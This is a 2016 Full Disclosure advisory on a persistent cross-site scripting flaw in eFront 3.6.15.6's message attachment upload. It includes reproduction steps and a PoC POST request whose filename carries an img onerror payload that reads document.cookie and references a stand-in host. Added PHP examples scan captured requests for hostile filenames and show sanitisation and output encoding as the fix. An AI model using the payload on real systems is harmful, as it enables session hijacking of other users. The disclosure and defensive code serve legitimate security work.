List: full-disclosure
Subject: [FD] eFront 3.6.15.6 CMS – (Message Attachment) Persistent Cr
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-02-24 10:38:11
Message-ID: 56CD8813.8090706 () vulnerability-lab ! com
Document Title:
===============
eFront 3.6.15.6 CMS – (Message Attachment) Persistent Cross Site Scripting Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1765
Release Date:
=============
2016-02-24
Vulnerability Laboratory ID (VL-ID):
====================================
1765
Common Vulnerability Scoring System:
====================================
4
Product & Service Introduction:
===============================
eFrontPro is a powerful learning management system that provides effective employee training that fits your brand preferences for both online training & blended learning. eFrontPro can help you improve employee learning & development, ensure compliance, track employee training, engage your workforce and support organizational goals. Trusted by hundreds of companies and organizations around the world, eFrontPro is committed to assisting you in training people.
(Copy of the Homepage: http://www.efrontlearning.net/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an application-side validation web vulnerability in the eFront eLearning v3.6.15.6 CMS.
Vulnerability Disclosure Timeline:
==================================
2016-02-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official eFront eLearning v3.6.15.6 Content Management System. The vulnerability allows remote attackers to inject their own malicious script code into the application-side context of the vulnerable module/function.
The vulnerability is located in the `message attachment file` value of the `file upload` module. Remote attackers are able to inject malicious script code through the POST request of the file upload in the message module to compromise the `message` module. The attack vector is located on the application-side of the product and the request method used to inject is POST. The execution point is the vulnerable `message` module. The attachment filename is stored without sanitization and later rendered into the message view without output encoding, so the injected markup executes in the browser of whoever opens the message, in the user panel or the admin panel.
Exploitation of the persistent web vulnerability requires a low privileged web application user account and low user interaction (click or forward). Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent loading of malicious script code or persistent manipulation of the web module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] efront CMS - Messages Module - message attachment (Image)
Vulnerable Parameter(s):
[+] attachment
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged web-application user account and low user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.
Manual steps to reproduce the vulnerability ...
1. Register an eFront CMS account and log in to the web-application
2. Open the link ../student.php?ctg=messages&add=1
3. Click the send message button
4. Upload an image with the name "><img src="http://evilsource.localhost:8080" onerror=alert(document.cookie)>.jpg
5. Directly after the upload, pick a recipient and send the message
6. The execution of the vulnerability occurs in the message module user panel or admin panel
7. Successful reproduction of the vulnerability!
--- PoC Session Logs [POST] ---
POST /efront/www/student.php?ctg=messages&add=1 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lawrencelab.byethost18.com/efront/www/student.php?ctg=messages&add=1
Cookie: display_all_courses=1; PHPSESSID=b8b6af376a0d0cd87c16622; __test=b80983dafef045e957b8be0ceb; PHPSESSID=b8b6af376a0d076cacd87c16622; parent_sid=b8b6af376a0ffa76cacd87c16622
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------206452991920433123311648543799
Content-Length: 5642
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="_qf__new_message_form"
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="previous_url"
http://lawrencelab.byethost18.com/efront/www/student.php?ctg=messages
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="qfS_csrf"
7d69af83ffcff276f553044059274a50
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="recipient"
Administrator S. (admin)
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="bcc"
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="recipients"
only_specific_users
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="specific_course_completed"
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="user_type"
student
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="subject"
Hey check it
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="body"
please see attachments
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="attachment[0]"; filename="[PERSISTENT INJECTED SCRIPT CODE!]"><img src="http://evilsource.localhost:8080" onerror=alert(document.cookie)>.jpg"
Content-Type: image/jpeg
Content-Type: image/jpeg
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="submit_send_message"
Send message
-----------------------------206452991920433123311648543799--
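The request above shows that the server accepts whatever string the client places in the filename= parameter of the attachment part. As an added example that is not part of the advisory or of the eFront project, the following PHP scans a captured multipart/form-data body for upload filenames that carry HTML markup, which is what a defender reviewing proxy or WAF captures would look for to tell whether this vector has been used against an instance. The request body, boundary and function names are all constructed for this example.

```php
<?php
declare(strict_types=1);

// Added example, not eFront code. Scans a captured multipart/form-data body
// for upload part filenames that contain HTML markup. Boundary, body and
// function names are constructed for this example.

const SAMPLE_BOUNDARY = '---------------------------206452991920433123311648543799';

/** Constructed request body modelled on the PoC: one clean upload, one hostile filename. */
function sampleBody(): string
{
    $delim = '--' . SAMPLE_BOUNDARY;
    return implode("\r\n", [
        $delim,
        'Content-Disposition: form-data; name="subject"',
        '',
        'Hey check it',
        $delim,
        'Content-Disposition: form-data; name="attachment[0]"; filename="report.jpg"',
        'Content-Type: image/jpeg',
        '',
        '(image bytes)',
        $delim,
        'Content-Disposition: form-data; name="attachment[1]"; filename=""><img src="http://evilsource.localhost:8080" onerror=alert(document.cookie)>.jpg"',
        'Content-Type: image/jpeg',
        '',
        '(image bytes)',
        $delim . '--',
        '',
    ]);
}

/**
 * Returns one ['field' => ..., 'filename' => ...] entry per file part.
 * The filename is taken as the maximal span between filename=" and the last
 * quote on the header line: multipart parsers disagree on how to treat quotes
 * embedded in the value, and the stored name is what the message view renders,
 * so the scan must see everything the application might have kept.
 */
function extractUploadFilenames(string $body, string $boundary): array
{
    $found = [];
    foreach (explode('--' . $boundary, $body) as $part) {
        // Part headers end at the first blank line.
        $headerEnd   = strpos($part, "\r\n\r\n");
        $headerBlock = $headerEnd === false ? $part : substr($part, 0, $headerEnd);
        foreach (explode("\r\n", $headerBlock) as $line) {
            $line = trim($line);
            if (stripos($line, 'content-disposition:') !== 0) {
                continue;
            }
            $pos = stripos($line, 'filename="');
            if ($pos === false) {
                continue;
            }
            // \b keeps this from matching the "name=" inside "filename=".
            $field = preg_match('/\bname="([^"]*)"/i', $line, $m) ? $m[1] : '';
            $raw   = rtrim(substr($line, $pos + strlen('filename="')), '"');
            $found[] = ['field' => $field, 'filename' => $raw];
        }
    }
    return $found;
}

/** Flags names containing HTML-significant characters, an inline event handler or a javascript: URL. */
function isSuspiciousFilename(string $name): bool
{
    return preg_match('/[<>"\'&]|\bon[a-z]+\s*=|javascript:/i', $name) === 1;
}

/** Returns only the upload parts whose filename looks like markup. */
function findHostileUploads(string $body, string $boundary): array
{
    return array_values(array_filter(
        extractUploadFilenames($body, $boundary),
        fn(array $upload): bool => isSuspiciousFilename($upload['filename'])
    ));
}

foreach (findHostileUploads(sampleBody(), SAMPLE_BOUNDARY) as $hit) {
    printf("ALERT: field %s carries markup in its filename: %s\n",
        $hit['field'], json_encode($hit['filename']));
}
```

Run against the constructed body, only attachment[1] is reported. The character class in isSuspiciousFilename is deliberately broad: a legitimate image name has no reason to contain a quote or an angle bracket, so a hit is worth a look even when it is not a complete payload.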
Reference(s):
http://efront.localhost:8080/efront/
http://efront.localhost:8080/efront/www/
http://efront.localhost:8080/efront/www/student.php
Solution - Fix & Patch:
=======================
Parse and encode the filename of the message attachments to prevent persistent script code execution. Restrict the input and disallow the use of special characters in the album name or filename value.
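To make the fix concrete, here is an added PHP example that is not eFront's own code (function names, the allowed-extension list and the download URL are assumptions). It shows both layers the solution asks for: a filename normaliser applied when the attachment is stored, and HTML output encoding applied when the stored name is rendered in the message view. It is run against the filename from the advisory's own PoC request, beside the vulnerable rendering pattern the advisory describes.

```php
<?php
declare(strict_types=1);

// Added example, not eFront code. Two layers for the fix described above:
// normalise the attachment filename when it is stored, and HTML-encode it
// when it is rendered. Function names and the download URL are assumptions.

/**
 * Normalises a client-supplied filename before it is stored or shown.
 * Keeps only the last path segment, replaces everything outside
 * [A-Za-z0-9._-] with '_', requires an allow-listed image extension and
 * caps the length. Returns null when the name is unusable so the upload
 * can be refused.
 */
function sanitizeAttachmentFilename(string $clientName, array $allowedExt = ['jpg', 'jpeg', 'png', 'gif']): ?string
{
    // basename() only splits on '/', so fold Windows separators first.
    $base = basename(str_replace('\\', '/', $clientName));
    $base = preg_replace('/[^A-Za-z0-9._-]/', '_', $base) ?? '';
    $base = trim($base, '._');          // no hidden files, no leading/trailing dots
    if ($base === '') {
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    return substr($base, 0, 120);
}

/** Encodes a value for an HTML text or attribute context; ENT_QUOTES covers both quote styles. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Builds the attachment link printed in the message view (URL layout is an assumption). */
function renderAttachmentLink(string $displayName, string $downloadUrl): string
{
    return '<a href="' . h($downloadUrl) . '">' . h($displayName) . '</a>';
}

// The filename from the advisory's PoC request.
$hostile = '"><img src="http://evilsource.localhost:8080" onerror=alert(document.cookie)>.jpg';

// Vulnerable pattern: the raw name goes straight into the markup, so the quote
// closes the href attribute and the <img onerror> runs for whoever opens the message.
$vulnerable = '<a href="download.php?f=' . $hostile . '">' . $hostile . '</a>';

// Hardened output: the same name, encoded at render time, so even a record
// stored before the fix cannot break out of the attribute or the text node.
$encoded = renderAttachmentLink($hostile, 'download.php?f=' . rawurlencode($hostile));

// Hardened input: the name that would actually be stored for this upload.
$stored = sanitizeAttachmentFilename($hostile);

echo "vulnerable: $vulnerable\n";
echo "encoded:    $encoded\n";
echo "stored:     " . var_export($stored, true) . "\n";
echo "rejected:   " . var_export(sanitizeAttachmentFilename('../../shell.php'), true) . "\n";
```

Both layers are needed: the normaliser stops hostile names from ever being persisted, and the encoder protects every place the name is printed, including records created before the fix. A further hardening that the advisory does not mention, but which is common practice, is to store the file on disk under a server-generated name and keep the sanitized client name only as display metadata.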
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the efront web-application is estimated as medium. (CVSS 4.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer - http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer
Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@vulnerability-lab.com) to ask for permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/